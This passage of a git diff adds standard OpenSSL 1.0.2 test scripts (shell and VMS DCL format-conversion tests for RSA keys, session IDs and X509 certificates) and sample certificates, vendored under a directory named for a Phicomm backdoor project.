+$!	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> d"
+$	'cmd' -verify -in f.p -inform p -outform d -out ff.d3
+$	if $severity .ne. 1 then exit 3
+$
+$!	write sys$output "d -> t"
+$!	'cmd' -in f.d -inform d -outform t -out ff.t1
+$!	if $severity .ne. 1 then exit 3
+$!	write sys$output "t -> t"
+$!	'cmd' -in f.t -inform t -outform t -out ff.t2
+$!	if $severity .ne. 1 then exit 3
+$!	write sys$output "p -> t"
+$!	'cmd' -in f.p -inform p -outform t -out ff.t3
+$!	if $severity .ne. 1 then exit 3
+$
+$	write sys$output "d -> p"
+$	'cmd' -in f.d -inform d -outform p -out ff.p1
+$	if $severity .ne. 1 then exit 3
+$!	write sys$output "t -> p"
+$!	'cmd' -in f.t -inform t -outform p -out ff.p2
+$!	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> p"
+$	'cmd' -in f.p -inform p -outform p -out ff.p3
+$	if $severity .ne. 1 then exit 3
+$
+$	backup/compare fff.p f.p
+$	if $severity .ne. 1 then exit 3
+$	backup/compare fff.p ff.p1
+$	if $severity .ne. 1 then exit 3
+$!	backup/compare fff.p ff.p2
+$!	if $severity .ne. 1 then exit 3
+$	backup/compare fff.p ff.p3
+$	if $severity .ne. 1 then exit 3
+$
+$!	backup/compare f.t ff.t1
+$!	if $severity .ne. 1 then exit 3
+$!	backup/compare f.t ff.t2
+$!	if $severity .ne. 1 then exit 3
+$!	backup/compare f.t ff.t3
+$!	if $severity .ne. 1 then exit 3
+$
+$	backup/compare f.p ff.p1
+$	if $severity .ne. 1 then exit 3
+$!	backup/compare f.p ff.p2
+$!	if $severity .ne. 1 then exit 3
+$	backup/compare f.p ff.p3
+$	if $severity .ne. 1 then exit 3
+$
+$	delete f.*;*,ff.*;*,fff.*;*
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/trsa b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/trsa
new file mode 100644
index 0000000..5a2290f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/trsa
@@ -0,0 +1,83 @@
+#!/bin/sh
+
+if ../util/shlib_wrap.sh ../apps/openssl no-rsa; then
+  echo skipping rsa conversion test
+  exit 0
+fi
+
+cmd='../util/shlib_wrap.sh ../apps/openssl rsa'
+
+if [ "$1"x != "x" ]; then
+	t=$1
+else
+	t=testrsa.pem
+fi
+
+echo testing rsa conversions
+cp $t rsa-fff.p
+
+echo "p -> d"
+$cmd -in rsa-fff.p -inform p -outform d >rsa-f.d
+if [ $? != 0 ]; then exit 1; fi
+#echo "p -> t"
+#$cmd -in rsa-fff.p -inform p -outform t >rsa-f.t
+#if [ $? != 0 ]; then exit 1; fi
+echo "p -> p"
+$cmd -in rsa-fff.p -inform p -outform p >rsa-f.p
+if [ $? != 0 ]; then exit 1; fi
+
+echo "d -> d"
+$cmd -in rsa-f.d -inform d -outform d >rsa-ff.d1
+if [ $? != 0 ]; then exit 1; fi
+#echo "t -> d"
+#$cmd -in rsa-f.t -inform t -outform d >rsa-ff.d2
+#if [ $? != 0 ]; then exit 1; fi
+echo "p -> d"
+$cmd -in rsa-f.p -inform p -outform d >rsa-ff.d3
+if [ $? != 0 ]; then exit 1; fi
+
+#echo "d -> t"
+#$cmd -in rsa-f.d -inform d -outform t >rsa-ff.t1
+#if [ $? != 0 ]; then exit 1; fi
+#echo "t -> t"
+#$cmd -in rsa-f.t -inform t -outform t >rsa-ff.t2
+#if [ $? != 0 ]; then exit 1; fi
+#echo "p -> t"
+#$cmd -in rsa-f.p -inform p -outform t >rsa-ff.t3
+#if [ $? != 0 ]; then exit 1; fi
+
+echo "d -> p"
+$cmd -in rsa-f.d -inform d -outform p >rsa-ff.p1
+if [ $? != 0 ]; then exit 1; fi
+#echo "t -> p"
+#$cmd -in rsa-f.t -inform t -outform p >rsa-ff.p2
+#if [ $? != 0 ]; then exit 1; fi
+echo "p -> p"
+$cmd -in rsa-f.p -inform p -outform p >rsa-ff.p3
+if [ $? != 0 ]; then exit 1; fi
+
+cmp rsa-fff.p rsa-f.p
+if [ $? != 0 ]; then exit 1; fi
+cmp rsa-fff.p rsa-ff.p1
+if [ $? != 0 ]; then exit 1; fi
+#cmp rsa-fff.p rsa-ff.p2
+#if [ $? != 0 ]; then exit 1; fi
+cmp rsa-fff.p rsa-ff.p3
+if [ $? != 0 ]; then exit 1; fi
+
+#cmp rsa-f.t rsa-ff.t1
+#if [ $? != 0 ]; then exit 1; fi
+#cmp rsa-f.t rsa-ff.t2
+#if [ $? != 0 ]; then exit 1; fi
+#cmp rsa-f.t rsa-ff.t3
+#if [ $? != 0 ]; then exit 1; fi
+
+cmp rsa-f.p rsa-ff.p1
+if [ $? != 0 ]; then exit 1; fi
+#cmp rsa-f.p rsa-ff.p2
+#if [ $? != 0 ]; then exit 1; fi
+cmp rsa-f.p rsa-ff.p3
+if [ $? != 0 ]; then exit 1; fi
+
+/bin/rm -f rsa-f.* rsa-ff.* rsa-fff.*
+exit 0
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/trsa.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/trsa.com
new file mode 100644
index 0000000..5418084
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/trsa.com
@@ -0,0 +1,99 @@
+$! TRSA.COM  --  Tests rsa keys
+$
+$	__arch = "VAX"
+$	if f$getsyi("cpu") .ge. 128 then -
+	   __arch = f$edit( f$getsyi( "ARCH_NAME"), "UPCASE")
+$	if __arch .eqs. "" then __arch = "UNK"
+$!
+$	if (p2 .eqs. "64") then __arch = __arch+ "_64"
+$!
+$	exe_dir = "sys$disk:[-.''__arch'.exe.apps]"
+$
+$	set noon
+$	define/user sys$output nla0:
+$	mcr 'exe_dir'openssl no-rsa
+$	save_severity=$SEVERITY
+$	set on
+$	if save_severity
+$	then
+$	    write sys$output "skipping RSA conversion test"
+$	    exit
+$	endif
+$
+$	cmd = "mcr ''exe_dir'openssl rsa"
+$
+$	t = "testrsa.pem"
+$	if p1 .nes. "" then t = p1
+$
+$	write sys$output "testing RSA conversions"
+$	if f$search("fff.*") .nes "" then delete fff.*;*
+$	if f$search("ff.*") .nes "" then delete ff.*;*
+$	if f$search("f.*") .nes "" then delete f.*;*
+$	convert/fdl=sys$input: 't' fff.p
+RECORD
+	FORMAT STREAM_LF
+$
+$	write sys$output "p -> d"
+$	'cmd' -in fff.p -inform p -outform d -out f.d
+$	if $severity .ne. 1 then exit 3
+$!	write sys$output "p -> t"
+$!	'cmd' -in fff.p -inform p -outform t -out f.t
+$!	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> p"
+$	'cmd' -in fff.p -inform p -outform p -out f.p
+$	if $severity .ne. 1 then exit 3
+$
+$	write sys$output "d -> d"
+$	'cmd' -in f.d -inform d -outform d -out ff.d1
+$	if $severity .ne. 1 then exit 3
+$!	write sys$output "t -> d"
+$!	'cmd' -in f.t -inform t -outform d -out ff.d2
+$!	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> d"
+$	'cmd' -in f.p -inform p -outform d -out ff.d3
+$	if $severity .ne. 1 then exit 3
+$
+$!	write sys$output "d -> t"
+$!	'cmd' -in f.d -inform d -outform t -out ff.t1
+$!	if $severity .ne. 1 then exit 3
+$!	write sys$output "t -> t"
+$!	'cmd' -in f.t -inform t -outform t -out ff.t2
+$!	if $severity .ne. 1 then exit 3
+$!	write sys$output "p -> t"
+$!	'cmd' -in f.p -inform p -outform t -out ff.t3
+$!	if $severity .ne. 1 then exit 3
+$
+$	write sys$output "d -> p"
+$	'cmd' -in f.d -inform d -outform p -out ff.p1
+$	if $severity .ne. 1 then exit 3
+$!	write sys$output "t -> p"
+$!	'cmd' -in f.t -inform t -outform p -out ff.p2
+$!	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> p"
+$	'cmd' -in f.p -inform p -outform p -out ff.p3
+$	if $severity .ne. 1 then exit 3
+$
+$	backup/compare fff.p f.p
+$	if $severity .ne. 1 then exit 3
+$	backup/compare fff.p ff.p1
+$	if $severity .ne. 1 then exit 3
+$!	backup/compare fff.p ff.p2
+$!	if $severity .ne. 1 then exit 3
+$	backup/compare fff.p ff.p3
+$	if $severity .ne. 1 then exit 3
+$
+$!	backup/compare f.t ff.t1
+$!	if $severity .ne. 1 then exit 3
+$!	backup/compare f.t ff.t2
+$!	if $severity .ne. 1 then exit 3
+$!	backup/compare f.t ff.t3
+$!	if $severity .ne. 1 then exit 3
+$
+$	backup/compare f.p ff.p1
+$	if $severity .ne. 1 then exit 3
+$!	backup/compare f.p ff.p2
+$!	if $severity .ne. 1 then exit 3
+$	backup/compare f.p ff.p3
+$	if $severity .ne. 1 then exit 3
+$
+$	delete f.*;*,ff.*;*,fff.*;*
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tsid b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tsid
new file mode 100644
index 0000000..e1eb503
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tsid
@@ -0,0 +1,78 @@
+#!/bin/sh
+
+cmd='../util/shlib_wrap.sh ../apps/openssl sess_id'
+
+if [ "$1"x != "x" ]; then
+	t=$1
+else
+	t=testsid.pem
+fi
+
+echo testing session-id conversions
+cp $t sid-fff.p
+
+echo "p -> d"
+$cmd -in sid-fff.p -inform p -outform d >sid-f.d
+if [ $? != 0 ]; then exit 1; fi
+#echo "p -> t"
+#$cmd -in sid-fff.p -inform p -outform t >sid-f.t
+#if [ $? != 0 ]; then exit 1; fi
+echo "p -> p"
+$cmd -in sid-fff.p -inform p -outform p >sid-f.p
+if [ $? != 0 ]; then exit 1; fi
+
+echo "d -> d"
+$cmd -in sid-f.d -inform d -outform d >sid-ff.d1
+if [ $? != 0 ]; then exit 1; fi
+#echo "t -> d"
+#$cmd -in sid-f.t -inform t -outform d >sid-ff.d2
+#if [ $? != 0 ]; then exit 1; fi
+echo "p -> d"
+$cmd -in sid-f.p -inform p -outform d >sid-ff.d3
+if [ $? != 0 ]; then exit 1; fi
+
+#echo "d -> t"
+#$cmd -in sid-f.d -inform d -outform t >sid-ff.t1
+#if [ $? != 0 ]; then exit 1; fi
+#echo "t -> t"
+#$cmd -in sid-f.t -inform t -outform t >sid-ff.t2
+#if [ $? != 0 ]; then exit 1; fi
+#echo "p -> t"
+#$cmd -in sid-f.p -inform p -outform t >sid-ff.t3
+#if [ $? != 0 ]; then exit 1; fi
+
+echo "d -> p"
+$cmd -in sid-f.d -inform d -outform p >sid-ff.p1
+if [ $? != 0 ]; then exit 1; fi
+#echo "t -> p"
+#$cmd -in sid-f.t -inform t -outform p >sid-ff.p2
+#if [ $? != 0 ]; then exit 1; fi
+echo "p -> p"
+$cmd -in sid-f.p -inform p -outform p >sid-ff.p3
+if [ $? != 0 ]; then exit 1; fi
+
+cmp sid-fff.p sid-f.p
+if [ $? != 0 ]; then exit 1; fi
+cmp sid-fff.p sid-ff.p1
+if [ $? != 0 ]; then exit 1; fi
+#cmp sid-fff.p sid-ff.p2
+#if [ $? != 0 ]; then exit 1; fi
+cmp sid-fff.p sid-ff.p3
+if [ $? != 0 ]; then exit 1; fi
+
+#cmp sid-f.t sid-ff.t1
+#if [ $? != 0 ]; then exit 1; fi
+#cmp sid-f.t sid-ff.t2
+#if [ $? != 0 ]; then exit 1; fi
+#cmp sid-f.t sid-ff.t3
+#if [ $? != 0 ]; then exit 1; fi
+
+cmp sid-f.p sid-ff.p1
+if [ $? != 0 ]; then exit 1; fi
+#cmp sid-f.p sid-ff.p2
+#if [ $? != 0 ]; then exit 1; fi
+cmp sid-f.p sid-ff.p3
+if [ $? != 0 ]; then exit 1; fi
+
+/bin/rm -f sid-f.* sid-ff.* sid-fff.*
+exit 0
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tsid.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tsid.com
new file mode 100644
index 0000000..b6c4e49
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tsid.com
@@ -0,0 +1,88 @@
+$! TSID.COM  --  Tests sid keys
+$
+$	__arch = "VAX"
+$	if f$getsyi("cpu") .ge. 128 then -
+	   __arch = f$edit( f$getsyi( "ARCH_NAME"), "UPCASE")
+$	if __arch .eqs. "" then __arch = "UNK"
+$!
+$	if (p2 .eqs. "64") then __arch = __arch+ "_64"
+$!
+$	exe_dir = "sys$disk:[-.''__arch'.exe.apps]"
+$
+$	cmd = "mcr ''exe_dir'openssl sess_id"
+$
+$	t = "testsid.pem"
+$	if p1 .nes. "" then t = p1
+$
+$	write sys$output "testing session-id conversions"
+$	if f$search("fff.*") .nes "" then delete fff.*;*
+$	if f$search("ff.*") .nes "" then delete ff.*;*
+$	if f$search("f.*") .nes "" then delete f.*;*
+$	convert/fdl=sys$input: 't' fff.p
+RECORD
+	FORMAT STREAM_LF
+$
+$	write sys$output "p -> d"
+$	'cmd' -in fff.p -inform p -outform d -out f.d
+$	if $severity .ne. 1 then exit 3
+$!	write sys$output "p -> t"
+$!	'cmd' -in fff.p -inform p -outform t -out f.t
+$!	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> p"
+$	'cmd' -in fff.p -inform p -outform p -out f.p
+$	if $severity .ne. 1 then exit 3
+$
+$	write sys$output "d -> d"
+$	'cmd' -in f.d -inform d -outform d -out ff.d1
+$	if $severity .ne. 1 then exit 3
+$!	write sys$output "t -> d"
+$!	'cmd' -in f.t -inform t -outform d -out ff.d2
+$!	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> d"
+$	'cmd' -in f.p -inform p -outform d -out ff.d3
+$	if $severity .ne. 1 then exit 3
+$
+$!	write sys$output "d -> t"
+$!	'cmd' -in f.d -inform d -outform t -out ff.t1
+$!	if $severity .ne. 1 then exit 3
+$!	write sys$output "t -> t"
+$!	'cmd' -in f.t -inform t -outform t -out ff.t2
+$!	if $severity .ne. 1 then exit 3
+$!	write sys$output "p -> t"
+$!	'cmd' -in f.p -inform p -outform t -out ff.t3
+$!	if $severity .ne. 1 then exit 3
+$
+$	write sys$output "d -> p"
+$	'cmd' -in f.d -inform d -outform p -out ff.p1
+$	if $severity .ne. 1 then exit 3
+$!	write sys$output "t -> p"
+$!	'cmd' -in f.t -inform t -outform p -out ff.p2
+$!	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> p"
+$	'cmd' -in f.p -inform p -outform p -out ff.p3
+$	if $severity .ne. 1 then exit 3
+$
+$	backup/compare fff.p f.p
+$	if $severity .ne. 1 then exit 3
+$	backup/compare fff.p ff.p1
+$	if $severity .ne. 1 then exit 3
+$!	backup/compare fff.p ff.p2
+$!	if $severity .ne. 1 then exit 3
+$	backup/compare fff.p ff.p3
+$	if $severity .ne. 1 then exit 3
+$
+$!	backup/compare f.t ff.t1
+$!	if $severity .ne. 1 then exit 3
+$!	backup/compare f.t ff.t2
+$!	if $severity .ne. 1 then exit 3
+$!	backup/compare f.t ff.t3
+$!	if $severity .ne. 1 then exit 3
+$
+$	backup/compare f.p ff.p1
+$	if $severity .ne. 1 then exit 3
+$!	backup/compare f.p ff.p2
+$!	if $severity .ne. 1 then exit 3
+$	backup/compare f.p ff.p3
+$	if $severity .ne. 1 then exit 3
+$
+$	delete f.*;*,ff.*;*,fff.*;*
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tverify.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tverify.com
new file mode 100644
index 0000000..d888344
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tverify.com
@@ -0,0 +1,65 @@
+$! TVERIFY.COM
+$
+$	__arch = "VAX"
+$	if f$getsyi("cpu") .ge. 128 then -
+	   __arch = f$edit( f$getsyi( "ARCH_NAME"), "UPCASE")
+$	if __arch .eqs. "" then __arch = "UNK"
+$!
+$	if (p1 .eqs. "64") then __arch = __arch+ "_64"
+$!
+$	line_max = 255 ! Could be longer on modern non-VAX.
+$	temp_file_name = "certs_"+ f$getjpi( "", "PID")+ ".tmp"
+$	exe_dir = "sys$disk:[-.''__arch'.exe.apps]"
+$	cmd = "mcr ''exe_dir'openssl verify ""-CAfile"" ''temp_file_name'"
+$	cmd_len = f$length( cmd)
+$	pems = "[-.certs...]*.pem"
+$!
+$!	Concatenate all the certificate files.
+$!
+$	copy /concatenate 'pems' 'temp_file_name'
+$!
+$!	Loop through all the certificate files.
+$!
+$	args = ""
+$	old_f = ""
+$ loop_file: 
+$	    f = f$search( pems)
+$	    if ((f .nes. "") .and. (f .nes. old_f))
+$	    then
+$	      old_f = f
+$!
+$!	      If this file name would over-extend the command line, then
+$!	      run the command now.
+$!
+$	      if (cmd_len+ f$length( args)+ 1+ f$length( f) .gt. line_max)
+$	      then
+$	         if (args .eqs. "") then goto disaster
+$	         'cmd''args'
+$	         args = ""
+$	      endif
+$!	      Add the next file to the argument list.
+$	      args = args+ " "+ f
+$	   else
+$!            No more files in the list
+$	      goto loop_file_end
+$	   endif
+$	goto loop_file
+$	loop_file_end:
+$!
+$!	Run the command for any left-over arguments.
+$!
+$	if (args .nes. "")
+$	then
+$	   'cmd''args'
+$	endif
+$!
+$!	Delete the temporary file.
+$!
+$	if (f$search( "''temp_file_name';*") .nes. "") then -
+	 delete 'temp_file_name';*
+$!
+$	exit
+$!
+$	disaster:
+$	write sys$output "   Command line too long.  Doomed."
+$!
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tx509 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tx509
new file mode 100644
index 0000000..0ce3b52
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tx509
@@ -0,0 +1,78 @@
+#!/bin/sh
+
+cmd='../util/shlib_wrap.sh ../apps/openssl x509'
+
+if [ "$1"x != "x" ]; then
+	t=$1
+else
+	t=testx509.pem
+fi
+
+echo testing X509 conversions
+cp $t x509-fff.p
+
+echo "p -> d"
+$cmd -in x509-fff.p -inform p -outform d >x509-f.d
+if [ $? != 0 ]; then exit 1; fi
+echo "p -> n"
+$cmd -in x509-fff.p -inform p -outform n >x509-f.n
+if [ $? != 0 ]; then exit 1; fi
+echo "p -> p"
+$cmd -in x509-fff.p -inform p -outform p >x509-f.p
+if [ $? != 0 ]; then exit 1; fi
+
+echo "d -> d"
+$cmd -in x509-f.d -inform d -outform d >x509-ff.d1
+if [ $? != 0 ]; then exit 1; fi
+echo "n -> d"
+$cmd -in x509-f.n -inform n -outform d >x509-ff.d2
+if [ $? != 0 ]; then exit 1; fi
+echo "p -> d"
+$cmd -in x509-f.p -inform p -outform d >x509-ff.d3
+if [ $? != 0 ]; then exit 1; fi
+
+echo "d -> n"
+$cmd -in x509-f.d -inform d -outform n >x509-ff.n1
+if [ $? != 0 ]; then exit 1; fi
+echo "n -> n"
+$cmd -in x509-f.n -inform n -outform n >x509-ff.n2
+if [ $? != 0 ]; then exit 1; fi
+echo "p -> n"
+$cmd -in x509-f.p -inform p -outform n >x509-ff.n3
+if [ $? != 0 ]; then exit 1; fi
+
+echo "d -> p"
+$cmd -in x509-f.d -inform d -outform p >x509-ff.p1
+if [ $? != 0 ]; then exit 1; fi
+echo "n -> p"
+$cmd -in x509-f.n -inform n -outform p >x509-ff.p2
+if [ $? != 0 ]; then exit 1; fi
+echo "p -> p"
+$cmd -in x509-f.p -inform p -outform p >x509-ff.p3
+if [ $? != 0 ]; then exit 1; fi
+
+cmp x509-fff.p x509-f.p
+if [ $? != 0 ]; then exit 1; fi
+cmp x509-fff.p x509-ff.p1
+if [ $? != 0 ]; then exit 1; fi
+cmp x509-fff.p x509-ff.p2
+if [ $? != 0 ]; then exit 1; fi
+cmp x509-fff.p x509-ff.p3
+if [ $? != 0 ]; then exit 1; fi
+
+cmp x509-f.n x509-ff.n1
+if [ $? != 0 ]; then exit 1; fi
+cmp x509-f.n x509-ff.n2
+if [ $? != 0 ]; then exit 1; fi
+cmp x509-f.n x509-ff.n3
+if [ $? != 0 ]; then exit 1; fi
+
+cmp x509-f.p x509-ff.p1
+if [ $? != 0 ]; then exit 1; fi
+cmp x509-f.p x509-ff.p2
+if [ $? != 0 ]; then exit 1; fi
+cmp x509-f.p x509-ff.p3
+if [ $? != 0 ]; then exit 1; fi
+
+/bin/rm -f x509-f.* x509-ff.* x509-fff.*
+exit 0
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tx509.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tx509.com
new file mode 100644
index 0000000..93ce988
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tx509.com
@@ -0,0 +1,88 @@
+$! TX509.COM  --  Tests x509 certificates
+$
+$	__arch = "VAX"
+$	if f$getsyi("cpu") .ge. 128 then -
+	   __arch = f$edit( f$getsyi( "ARCH_NAME"), "UPCASE")
+$	if __arch .eqs. "" then __arch = "UNK"
+$!
+$	if (p2 .eqs. "64") then __arch = __arch+ "_64"
+$!
+$	exe_dir = "sys$disk:[-.''__arch'.exe.apps]"
+$
+$	cmd = "mcr ''exe_dir'openssl x509"
+$
+$	t = "testx509.pem"
+$	if p1 .nes. "" then t = p1
+$
+$	write sys$output "testing X509 conversions"
+$	if f$search("fff.*") .nes "" then delete fff.*;*
+$	if f$search("ff.*") .nes "" then delete ff.*;*
+$	if f$search("f.*") .nes "" then delete f.*;*
+$	convert/fdl=sys$input: 't' fff.p
+RECORD
+	FORMAT STREAM_LF
+$
+$	write sys$output "p -> d"
+$	'cmd' -in fff.p -inform p -outform d -out f.d
+$	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> n"
+$	'cmd' -in fff.p -inform p -outform n -out f.n
+$	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> p"
+$	'cmd' -in fff.p -inform p -outform p -out f.p
+$	if $severity .ne. 1 then exit 3
+$
+$	write sys$output "d -> d"
+$	'cmd' -in f.d -inform d -outform d -out ff.d1
+$	if $severity .ne. 1 then exit 3
+$	write sys$output "n -> d"
+$	'cmd' -in f.n -inform n -outform d -out ff.d2
+$	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> d"
+$	'cmd' -in f.p -inform p -outform d -out ff.d3
+$	if $severity .ne. 1 then exit 3
+$
+$	write sys$output "d -> n"
+$	'cmd' -in f.d -inform d -outform n -out ff.n1
+$	if $severity .ne. 1 then exit 3
+$	write sys$output "n -> n"
+$	'cmd' -in f.n -inform n -outform n -out ff.n2
+$	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> n"
+$	'cmd' -in f.p -inform p -outform n -out ff.n3
+$	if $severity .ne. 1 then exit 3
+$
+$	write sys$output "d -> p"
+$	'cmd' -in f.d -inform d -outform p -out ff.p1
+$	if $severity .ne. 1 then exit 3
+$	write sys$output "n -> p"
+$	'cmd' -in f.n -inform n -outform p -out ff.p2
+$	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> p"
+$	'cmd' -in f.p -inform p -outform p -out ff.p3
+$	if $severity .ne. 1 then exit 3
+$
+$	backup/compare fff.p f.p
+$	if $severity .ne. 1 then exit 3
+$	backup/compare fff.p ff.p1
+$	if $severity .ne. 1 then exit 3
+$	backup/compare fff.p ff.p2
+$	if $severity .ne. 1 then exit 3
+$	backup/compare fff.p ff.p3
+$	if $severity .ne. 1 then exit 3
+$
+$	backup/compare f.n ff.n1
+$	if $severity .ne. 1 then exit 3
+$	backup/compare f.n ff.n2
+$	if $severity .ne. 1 then exit 3
+$	backup/compare f.n ff.n3
+$	if $severity .ne. 1 then exit 3
+$
+$	backup/compare f.p ff.p1
+$	if $severity .ne. 1 then exit 3
+$	backup/compare f.p ff.p2
+$	if $severity .ne. 1 then exit 3
+$	backup/compare f.p ff.p3
+$	if $severity .ne. 1 then exit 3
+$
+$	delete f.*;*,ff.*;*,fff.*;*
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/v3-cert1.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/v3-cert1.pem
new file mode 100644
index 0000000..0da253d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/v3-cert1.pem
@@ -0,0 +1,16 @@
+-----BEGIN CERTIFICATE-----
+MIICjTCCAfigAwIBAgIEMaYgRzALBgkqhkiG9w0BAQQwRTELMAkGA1UEBhMCVVMx
+NjA0BgNVBAoTLU5hdGlvbmFsIEFlcm9uYXV0aWNzIGFuZCBTcGFjZSBBZG1pbmlz
+dHJhdGlvbjAmFxE5NjA1MjgxMzQ5MDUrMDgwMBcROTgwNTI4MTM0OTA1KzA4MDAw
+ZzELMAkGA1UEBhMCVVMxNjA0BgNVBAoTLU5hdGlvbmFsIEFlcm9uYXV0aWNzIGFu
+ZCBTcGFjZSBBZG1pbmlzdHJhdGlvbjEgMAkGA1UEBRMCMTYwEwYDVQQDEwxTdGV2
+ZSBTY2hvY2gwWDALBgkqhkiG9w0BAQEDSQAwRgJBALrAwyYdgxmzNP/ts0Uyf6Bp
+miJYktU/w4NG67ULaN4B5CnEz7k57s9o3YY3LecETgQ5iQHmkwlYDTL2fTgVfw0C
+AQOjgaswgagwZAYDVR0ZAQH/BFowWDBWMFQxCzAJBgNVBAYTAlVTMTYwNAYDVQQK
+Ey1OYXRpb25hbCBBZXJvbmF1dGljcyBhbmQgU3BhY2UgQWRtaW5pc3RyYXRpb24x
+DTALBgNVBAMTBENSTDEwFwYDVR0BAQH/BA0wC4AJODMyOTcwODEwMBgGA1UdAgQR
+MA8ECTgzMjk3MDgyM4ACBSAwDQYDVR0KBAYwBAMCBkAwCwYJKoZIhvcNAQEEA4GB
+AH2y1VCEw/A4zaXzSYZJTTUi3uawbbFiS2yxHvgf28+8Js0OHXk1H1w2d6qOHH21
+X82tZXd/0JtG0g1T9usFFBDvYK8O0ebgz/P5ELJnBL2+atObEuJy1ZZ0pBDWINR3
+WkDNLCGiTkCKp0F5EWIrVDwh54NNevkCQRZita+z4IBO
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/v3-cert2.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/v3-cert2.pem
new file mode 100644
index 0000000..de0723f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/v3-cert2.pem
@@ -0,0 +1,16 @@
+-----BEGIN CERTIFICATE-----
+MIICiTCCAfKgAwIBAgIEMeZfHzANBgkqhkiG9w0BAQQFADB9MQswCQYDVQQGEwJD
+YTEPMA0GA1UEBxMGTmVwZWFuMR4wHAYDVQQLExVObyBMaWFiaWxpdHkgQWNjZXB0
+ZWQxHzAdBgNVBAoTFkZvciBEZW1vIFB1cnBvc2VzIE9ubHkxHDAaBgNVBAMTE0Vu
+dHJ1c3QgRGVtbyBXZWIgQ0EwHhcNOTYwNzEyMTQyMDE1WhcNOTYxMDEyMTQyMDE1
+WjB0MSQwIgYJKoZIhvcNAQkBExVjb29rZUBpc3NsLmF0bC5ocC5jb20xCzAJBgNV
+BAYTAlVTMScwJQYDVQQLEx5IZXdsZXR0IFBhY2thcmQgQ29tcGFueSAoSVNTTCkx
+FjAUBgNVBAMTDVBhdWwgQS4gQ29va2UwXDANBgkqhkiG9w0BAQEFAANLADBIAkEA
+6ceSq9a9AU6g+zBwaL/yVmW1/9EE8s5you1mgjHnj0wAILuoB3L6rm6jmFRy7QZT
+G43IhVZdDua4e+5/n1ZslwIDAQABo2MwYTARBglghkgBhvhCAQEEBAMCB4AwTAYJ
+YIZIAYb4QgENBD8WPVRoaXMgY2VydGlmaWNhdGUgaXMgb25seSBpbnRlbmRlZCBm
+b3IgZGVtb25zdHJhdGlvbiBwdXJwb3Nlcy4wDQYJKoZIhvcNAQEEBQADgYEAi8qc
+F3zfFqy1sV8NhjwLVwOKuSfhR/Z8mbIEUeSTlnH3QbYt3HWZQ+vXI8mvtZoBc2Fz
+lexKeIkAZXCesqGbs6z6nCt16P6tmdfbZF3I3AWzLquPcOXjPf4HgstkyvVBn0Ap
+jAFN418KF/Cx4qyHB4cjdvLrRjjQLnb2+ibo7QU=
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/v3nametest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/v3nametest.c
new file mode 120000
index 0000000..1d209eb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/v3nametest.c
@@ -0,0 +1 @@
+../crypto/x509v3/v3nametest.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/wp_test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/wp_test.c
new file mode 120000
index 0000000..81b2021
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/wp_test.c
@@ -0,0 +1 @@
+../crypto/whrlpool/wp_test.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/090/586-100.nt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/090/586-100.nt
new file mode 100644
index 0000000..297ec3e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/090/586-100.nt
